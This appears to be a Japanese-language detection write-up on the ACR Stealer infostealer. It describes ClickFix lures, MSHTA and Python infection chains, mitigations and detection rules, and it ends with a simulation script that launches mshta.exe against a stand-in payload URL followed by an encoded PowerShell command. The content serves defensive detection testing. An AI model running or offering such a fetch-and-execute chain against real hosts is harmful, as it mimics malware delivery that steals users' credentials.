ACRスティーラー:脅威活動増加中に観察された2つの侵入チェーン
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
ACR Stealerはエンタープライズ環境を狙ったClickFixスタイルのソーシャルエンジニアリングを利用する情報窃取マルウェアファミリーです。このマルウェアは主に2つの感染チェーンを通じて動作します。1つはWebDAVを通してペイロードを配信し、Pythonローダーとブロックチェーンベースのコマンド&コントロールに依存するもので、もう1つはステガノグラフィによるペイロード配信を特徴とするMSHTAを用いるものです。主な目的は、ブラウザの認証情報、認証トークン、機密文書を盗むことです。
調査
Microsoft Defender Expertsは2026年4月末から6月中旬までの間に活動が増加したことを観測しました。調査により、Pythonとスケジュールタスクを用いたディスクベースのキャンペーンと、MSHTAとメモリー上のシェルコード実行を用いたファイルレスキャンペーンの2つの異なる実行パスが特定されました。タイムスタンピング、難読化されたPowerShell、ブロックチェーンバックのデッドドロップを含む高度な回避方法も分析されました。
軽減策
組織は、ユーザーにClickFixプロンプトを認識させ、アプリケーションコントロールを通じて信頼されていないスクリプトの実行を制限するよう訓練してください。マルウェア広告への露出を減らし、ウェブフィルタリングを強化することが、最初のアクセス試行を阻止するのに役立ちます。エンドポイントを強化し、ブラウザに保存されている認証情報への依存を制限し、多要素認証を強制することも、認証情報の盗難リスクを軽減するために重要です。
対応策
この活動が検出された場合、影響を受けたデバイスは直ちに隔離し、潜在的に妥協した認証情報とトークンを全てローテーションしてください。セッショントークンを取り消し、疑わしいリモート共有や画像ホスティングサービスへのアウトバウンド接続を調査するべきです。脅威を封じ込め、悪意のあるアーティファクトを効率的に削除するためにEDRのブロックモードを使用する必要があります。
攻撃フロー
検出
関連コマンドの検出による疑わしいLOLBAS MSHTA回避行動 (process_creation経由)
表示
LOLBAS Conhost (cmdline経由)
表示
COMオブジェクトを介したスケジュールタスク (powershell経由)
表示
Wmi PowerShellモジュールを使用したシステム情報の探索の可能性 (powershell経由)
表示
難読化されたPowerShellとソフトウェアアップデートを装ったスケジュールタスクの検出 [Windows PowerShell]
表示
ClickFixルアーによるACR Stealer実行の検出 [Windowsプロセス生成]
表示
シミュレーション実行
前提条件: テレメトリー & ベースライン 事前チェックが通過していること。
根拠: このセクションでは、検出ルールをトリガーするよう設計された対抗手法(TTP)の明確な実行を詳細に説明します。コマンドとナarrativeは、識別されたTTPsを直接反映し、検出ロジックで期待される正確なテレメトリーを生成することを目的としています。抽象的または無関係な例は誤診を招く可能性があります。
-
攻撃narrative & コマンド: 対抗者は偽の「ブラウザエラー」(ClickFix)でユーザーをターゲットにします。ユーザーがコマンドをターミナルにコピー&ペーストすると、
cmd.exeが呼び出されます。コマンドは指示しますmshta.exeが悪意のあるスクリプトを取得するためにリモートURLにアクセスするようにします。単純な文字列検出を回避するために、スクリプトはpowershell.exeを使用してエンコードされたコマンド (-Enc)をダウンロードしてACR Stealerマルウェアをメモリ内で実行し、従来のファイルベーススキャンを回避します。 -
回帰テストスクリプト:
# ACR Stealer ClickFixチェーンのシミュレーション # ステップ1: cmd.exeラッパーのシミュレーション # ステップ2: URLでmshta.exeを呼び出し # ステップ3: エンコードされたPowerShellコマンドに続く $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'ACR Stealerペイロード実行のシミュレーション'")) Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand" -
クリーンアップコマンド:
# このシミュレーションでは永続的なファイルは作成されませんが、孤立したプロセスが残らないことを確認してください Stop-Process -Name "mshta" -ErrorAction SilentlyContinue Stop-Process -Name "powershell" -ErrorAction SilentlyContinue